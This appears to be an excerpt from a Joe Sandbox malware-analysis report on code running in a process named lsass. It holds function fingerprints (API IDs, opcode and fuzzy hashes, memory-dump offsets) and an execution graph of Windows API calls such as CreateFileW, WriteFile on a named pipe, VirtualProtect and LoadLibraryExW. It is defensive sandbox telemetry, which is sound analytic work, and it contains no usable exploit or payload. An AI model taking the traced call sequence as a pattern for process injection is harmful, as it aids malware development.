                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 0fc22b56dfddb0527b2519421457ec22dff98415b2a2cc09f07841430687fcc4
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: A9618D32504BC4C5EB209F15E48879EB7A0F795B94F054217EBE917B96DB78D1A8CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction ID: f8827811e544d3c712e3cbab608fb4db90051d760574ad5d5195acb9cd4df361
                                                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction Fuzzy Hash: 11116D223187D1D1FB109B25E89C35E62A4BB887C0F9241379BE983796EF69C95DC700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction ID: be312b6ec7ed32438a8ab04b1f94e644d8c529af7275a8a121309e55da483e43
                                                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction Fuzzy Hash: 95D19733714B84C9F711CBA9D48869C37B1F354B98F424227CF5AA7B9ADA35C54AC740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                          • Instruction ID: 2a70fa74545aae0f0f7f42aa10fee5355385ed8f800a43245c7b0e17be634c27
                                                          • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                          • Instruction Fuzzy Hash: 12016932610B90DAE718EF66E88C24DBBA0F788F80B0A4127DF8943769DF34E055C744
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000202C0AF28DF), ref: 00000202C0AF2A12
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ConsoleMode
                                                          • String ID:
                                                          • API String ID: 4145635619-0
                                                          • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                          • Instruction ID: e5c55b3226368dcd247dca320c2a3230a39d92155be30f3a4a2b229685e1e7c3
                                                          • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                          • Instruction Fuzzy Hash: 9891BB73610750C9FB64DF6598DC7AD2BA0F354B88F46411BDF4A67A86DA36C88BC300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction ID: 62f884037c56f2eb9e101b9eb6d4c8b48e0da77c088b7664056c18917f8be7ca
                                                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction Fuzzy Hash: C9111526710B04CAFB00CB60E8983AC33A4F719758F450E22EB6D867A5EB78C5688380
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction ID: c36f8d58733dc3f660be89ea2119618fcbbc44045d128cf22e40849943d72586
                                                          • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction Fuzzy Hash: F7718D72204BC1C6F734DE26A8DC3AE6794F384BC4F420027DFAA47B8ADA75C6188740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000003.2182941443.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_3_202c0ab0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 3242871069-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 28f06788d7490d2f5700d0b906615798fe2339565d29d2b738e9ca2c21cad0d2
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: C7516F32312B00CAFB58CF1DE48CBAD7791E754B98F1686279B5A4778ADB79C849C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000003.2182941443.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_3_202c0ab0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 408d19260c6af9364fbe0ad4394b019caa14083f3a6b4c15843173c47a844df2
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: 0C61B432504BC4C5E7759F15E48879EB7A0F785B88F054217EB9807B96CB7CC198CB04
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction ID: 5b293359d0d2b51e4d09b33e3e8f78df7785384090e65af87d5b5511161bad2a
                                                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction Fuzzy Hash: F351C3262087C1C1F624DE26A4DC3AE7751F3D8B80F460127DFA943B8BDA3AC528C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction ID: 26b9c2485665c3f71962b909d1f450666f4b9807b38b51d5cd852ce8c5c245b5
                                                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction Fuzzy Hash: EB41AE73625B80C6E760DF65E48C79EA7A0F388784F924123EB4D87759EB79C44ACB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction ID: d80ba936443bac04cb9fd99f09a4bd6c60f5ba5f847f7c682dab857e29dad323
                                                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction Fuzzy Hash: 7A111932214B80C2EB618B25F48825DB7E5F788B94F594222EBCD07B65DF39C565CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction ID: b490cb0236f5556427fa48d8edeff5a12f4c048db8e28afcec6f42e5595949fb
                                                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction Fuzzy Hash: 1411AD22A01B90C1FB15DB66A88C25D67A0F788FC0F5A4126DF8E53766EF39D4568304
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction ID: ba11de582faed56b1472f891f123a21052092428e15a65ff5d1d74c6b2332d80
                                                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction Fuzzy Hash: CEE03932601704DAF718EB62D84C349BAE1EB88B06F468126CB0907351EF7E949D8740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction ID: dffc742d7b09788d05dbad6ec6a9b3515378bf5ce6b0b7ba61dd4a885f199826
                                                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction Fuzzy Hash: 79E0ED72611704DAF718EB62D84C35DB6A1FB88B16F468126CB0907351EE39949D9614

                                                          Execution Graph

                                                          Execution Coverage:1.5%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:1402
                                                          Total number of Limit Nodes:5
                                                          execution_graph 7575 2a661302518 GetProcessIdOfThread GetCurrentProcessId 7576 2a6613025be 7575->7576 7577 2a661302543 CreateFileW 7575->7577 7577->7576 7578 2a661302577 WriteFile ReadFile CloseHandle 7577->7578 7578->7576 8252 2a661311398 8253 2a6613113ae 8252->8253 8254 2a6613113f5 8253->8254 8255 2a66131140e 8253->8255 8256 2a66130d1f4 __std_exception_copy 13 API calls 8254->8256 8258 2a66130dd78 14 API calls 8255->8258 8260 2a661311405 8255->8260 8257 2a6613113fa 8256->8257 8259 2a66130d04c _invalid_parameter_noinfo 38 API calls 8257->8259 8258->8260 8259->8260 8557 2a66130c218 8558 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8557->8558 8559 2a66130c228 8558->8559 8560 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8559->8560 8561 2a66130c23c 8560->8561 8562 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8561->8562 8563 2a66130c250 8562->8563 8564 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8563->8564 8565 2a66130c264 8564->8565 8261 2a66131479d 8264 2a66130af34 8261->8264 8265 2a66130af9b 8264->8265 8266 2a66130af4e 8264->8266 8266->8265 8267 2a661309324 __CxxCallCatchBlock 9 API calls 8266->8267 8267->8265 7579 2a661304320 7580 2a66130426d 7579->7580 7581 2a6613042bd VirtualQuery 7580->7581 7582 2a6613042d7 7580->7582 7583 2a661304322 GetLastError 7580->7583 7581->7580 7581->7582 7583->7580 8566 2a66130fe20 8567 2a66130fe4a 8566->8567 8568 2a66130d220 __std_exception_copy 13 API calls 8567->8568 8569 2a66130fe6a 8568->8569 8570 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8569->8570 8571 2a66130fe78 8570->8571 8572 2a66130fea2 8571->8572 8574 2a66130d220 __std_exception_copy 13 API calls 8571->8574 8573 2a66130fec1 InitializeCriticalSectionEx 8572->8573 8576 2a66130feab 8572->8576 8573->8572 8575 2a66130fe94 8574->8575 8577 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8575->8577 8577->8572 8578 2a66130f820 8581 2a66130f7d8 8578->8581 8586 2a66130c558 EnterCriticalSection 8581->8586 7584 2a661308f0c 7591 2a66130946c 7584->7591 7590 2a661308f19 7592 2a661309474 7591->7592 7594 2a6613094a5 7592->7594 7595 2a661308f15 7592->7595 7608 2a661309d28 7592->7608 7596 2a6613094b4 __vcrt_uninitialize_locks DeleteCriticalSection 7594->7596 7595->7590 7597 2a661309400 7595->7597 7596->7595 7622 2a661309bfc 7597->7622 7613 2a661309aac 7608->7613 7611 2a661309d73 InitializeCriticalSectionAndSpinCount 7612 2a661309d68 7611->7612 7612->7592 7618 2a661309b96 7613->7618 7619 2a661309af0 __vcrt_FlsAlloc 7613->7619 7614 2a661309b1e LoadLibraryExW 7616 2a661309bbd 7614->7616 7617 2a661309b3f GetLastError 7614->7617 7615 2a661309bdd GetProcAddress 7615->7618 7616->7615 7620 2a661309bd4 FreeLibrary 7616->7620 7617->7619 7618->7611 7618->7612 7619->7614 7619->7615 7619->7618 7621 2a661309b61 LoadLibraryExW 7619->7621 7620->7615 7621->7616 7621->7619 7623 2a661309aac __vcrt_FlsAlloc 5 API calls 7622->7623 7624 2a661309c21 TlsAlloc 7623->7624 8587 2a66130820c 8594 2a661308f34 8587->8594 8590 2a661308219 8595 2a661309340 __CxxCallCatchBlock 9 API calls 8594->8595 8596 2a661308215 8595->8596 8596->8590 8597 2a66130c288 8596->8597 8598 2a66130cb10 __std_exception_copy 13 API calls 8597->8598 8599 2a661308222 8598->8599 8599->8590 8600 2a661308f48 8599->8600 8603 2a6613092dc 8600->8603 8602 2a661308f51 8602->8590 8604 2a6613092ed 8603->8604 8608 2a661309302 8603->8608 8605 2a661309c8c __CxxCallCatchBlock 6 API calls 8604->8605 8606 2a6613092f2 8605->8606 8609 2a661309cd4 8606->8609 8608->8602 8610 2a661309aac __vcrt_FlsAlloc 5 API calls 8609->8610 8611 2a661309d02 8610->8611 8612 2a661309d0c 8611->8612 8613 2a661309d14 TlsSetValue 8611->8613 8612->8608 8613->8612 9071 2a661305c8d 9073 2a661305c94 9071->9073 9072 2a661305cfb 9073->9072 9074 2a661305d77 VirtualProtect 9073->9074 9075 2a661305db1 9074->9075 9076 2a661305da3 GetLastError 9074->9076 9076->9075 8614 2a661314611 __scrt_dllmain_exception_filter 7626 2a66130c510 7627 2a66130c518 7626->7627 7628 2a66130c545 7627->7628 7630 2a66130c574 7627->7630 7631 2a66130c59f 7630->7631 7632 2a66130c5a3 7631->7632 7633 2a66130c582 DeleteCriticalSection 7631->7633 7632->7628 7633->7631 8615 2a6613041f9 8616 2a661304146 8615->8616 8617 2a661304196 VirtualQuery 8616->8617 8618 2a6613041b0 8616->8618 8619 2a6613041ca VirtualAlloc 8616->8619 8617->8616 8617->8618 8619->8618 8620 2a6613041fb GetLastError 8619->8620 8620->8616 8621 2a661305ff9 8622 2a661306000 VirtualProtect 8621->8622 8623 2a661306029 GetLastError 8622->8623 8624 2a661305f10 8622->8624 8623->8624 8625 2a66130cbfc 8630 2a66130f3a0 8625->8630 8627 2a66130cc05 8628 2a66130cb10 __std_exception_copy 13 API calls 8627->8628 8629 2a66130cc22 __vcrt_uninitialize_ptd 8627->8629 8628->8629 8631 2a66130f3b1 8630->8631 8632 2a66130f3b5 8630->8632 8631->8627 8632->8631 8633 2a66130ef88 9 API calls 8632->8633 8633->8631 9077 2a66131387c 9078 2a6613138b4 __GSHandlerCheckCommon 9077->9078 9079 2a6613138e0 9078->9079 9081 2a661309a24 9078->9081 9082 2a661309324 __CxxCallCatchBlock 9 API calls 9081->9082 9083 2a661309a4e 9082->9083 9084 2a661309324 __CxxCallCatchBlock 9 API calls 9083->9084 9085 2a661309a5b 9084->9085 9086 2a661309324 __CxxCallCatchBlock 9 API calls 9085->9086 9087 2a661309a64 9086->9087 9087->9079 7634 2a661302300 7635 2a661302331 7634->7635 7636 2a661302447 7635->7636 7643 2a661302355 7635->7643 7644 2a661302412 7635->7644 7637 2a6613024bb 7636->7637 7638 2a66130244c 7636->7638 7641 2a6613035c8 11 API calls 7637->7641 7637->7644 7651 2a6613035c8 GetProcessHeap HeapAlloc 7638->7651 7640 2a66130238d StrCmpNIW 7640->7643 7641->7644 7643->7640 7643->7644 7645 2a661301d30 7643->7645 7646 2a661301d57 GetProcessHeap HeapAlloc 7645->7646 7648 2a661301db4 7645->7648 7647 2a661301d92 7646->7647 7646->7648 7657 2a661301cfc 7647->7657 7648->7643 7656 2a66130361b 7651->7656 7652 2a6613036d9 GetProcessHeap HeapFree 7652->7644 7653 2a6613036d4 7653->7652 7654 2a661303666 StrCmpNIW 7654->7656 7655 2a661301d30 6 API calls 7655->7656 7656->7652 7656->7653 7656->7654 7656->7655 7658 2a661301d13 7657->7658 7660 2a661301d1c GetProcessHeap HeapFree 7657->7660 7659 2a661301530 2 API calls 7658->7659 7659->7660 7660->7648 7661 2a66130b500 7666 2a66130c558 EnterCriticalSection 7661->7666 8268 2a66130c180 8271 2a66130bf38 8268->8271 8278 2a66130bf00 8271->8278 8276 2a66130bebc 13 API calls 8277 2a66130bf6b 8276->8277 8279 2a66130bf10 8278->8279 8280 2a66130bf15 8278->8280 8281 2a66130bebc 13 API calls 8279->8281 8282 2a66130bf1c 8280->8282 8281->8280 8283 2a66130bf2c 8282->8283 8284 2a66130bf31 8282->8284 8285 2a66130bebc 13 API calls 8283->8285 8284->8276 8285->8284 8634 2a6613027e8 8635 2a661302867 8634->8635 8636 2a6613028c9 GetFileType 8635->8636 8648 2a661302998 8635->8648 8637 2a6613028d7 StrCpyW 8636->8637 8638 2a6613028ed 8636->8638 8639 2a6613028fc 8637->8639 8640 2a661301ad4 4 API calls 8638->8640 8644 2a66130299d 8639->8644 8645 2a661302906 8639->8645 8640->8639 8641 2a661303f88 StrCmpNIW 8641->8644 8642 2a661303f88 StrCmpNIW 8642->8645 8643 2a661303708 4 API calls 8643->8644 8644->8641 8644->8643 8646 2a661301dd4 2 API calls 8644->8646 8644->8648 8645->8642 8647 2a661303708 4 API calls 8645->8647 8645->8648 8649 2a661301dd4 2 API calls 8645->8649 8646->8644 8647->8645 8649->8645 8650 2a66130b7ea 8651 2a66130c2f4 14 API calls 8650->8651 8652 2a66130b7ef 8651->8652 8653 2a66130b85f 8652->8653 8654 2a66130b815 GetModuleHandleW 8652->8654 8667 2a66130b6f8 8653->8667 8654->8653 8656 2a66130b822 8654->8656 8656->8653 8662 2a66130b904 GetModuleHandleExW 8656->8662 8663 2a66130b938 